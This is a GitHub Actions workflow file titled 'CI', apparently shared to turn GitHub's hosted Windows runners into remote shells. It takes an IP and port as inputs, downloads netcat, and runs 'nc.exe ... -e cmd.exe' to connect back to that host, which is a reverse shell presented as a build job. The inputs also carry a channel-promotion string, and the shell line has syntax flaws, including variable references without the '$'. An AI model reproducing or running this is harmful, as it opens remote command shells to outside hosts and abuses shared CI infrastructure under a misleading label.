name: CI

on: 
  workflow_dispatch:
    inputs:
    
      code:
        description: 'Subcribe PawitSahare'
        required: true
      pin:
        description: 'enter your ip '
        required: true
        
      port:
           description: 'enter your ip port'
           required: true
jobs:

  build:

    runs-on: windows-latest

    steps:

    - name: Download

      run: | 
       Invoke-WebRequest https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -OutFile nc.zip
       Expand-Archive nc.zip
       powershell
       ls
       cd nc
       ls
       cd netcat-1.11
       ls
       ./nc.exe -v {{ github.event.inputs.pin }} {{ github.event.inputs.port }}-e cmd.exe
       
       
    
